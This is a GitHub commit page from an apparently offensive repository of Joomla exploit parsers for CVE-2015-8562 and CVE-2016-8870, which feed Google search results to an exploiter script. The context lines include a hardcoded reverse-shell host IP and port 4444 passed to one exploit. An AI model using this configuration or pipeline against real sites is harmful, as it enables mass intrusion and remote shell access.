Skip to content

Commit

Permalink
info about exploiter.py
Browse files Browse the repository at this point in the history
  • Loading branch information
Third World Attacker committed Nov 3, 2016
1 parent 18c9430 commit 13fb73e
Show file tree
Hide file tree
Showing 3 changed files with 5 additions and 0 deletions.
1 change: 1 addition & 0 deletions .gitignore
@@ -1 +1,2 @@
__pycache__/
google_results.txt
2 changes: 2 additions & 0 deletions xpl_parsers/joomla_cve_2015_8562.py
Expand Up @@ -123,6 +123,8 @@ def main():
revshell = '189.61.111.244'
port = 4444
Joomla_CVE_2015_8562(filename, revshell, port)
print('[+] \033[31mThe results of this parser can be exploited '
'by\033[33m ../exploits/exploiter.py\033[39m\n')


if __name__ == '__main__':
Expand Down
2 changes: 2 additions & 0 deletions xpl_parsers/joomla_cve_2016_8870.py
Expand Up @@ -124,6 +124,8 @@ def joomla_cve(self):
def main():
filename = '../google_results.txt'
Joomla_CVE_2016_8870(filename)
print('[+] \033[31mThe results of this parser can be exploited '
'by\033[33m ../exploits/exploiter.py\033[39m\n')


if __name__ == '__main__':
Expand Down

0 comments on commit 13fb73e

Please sign in to comment.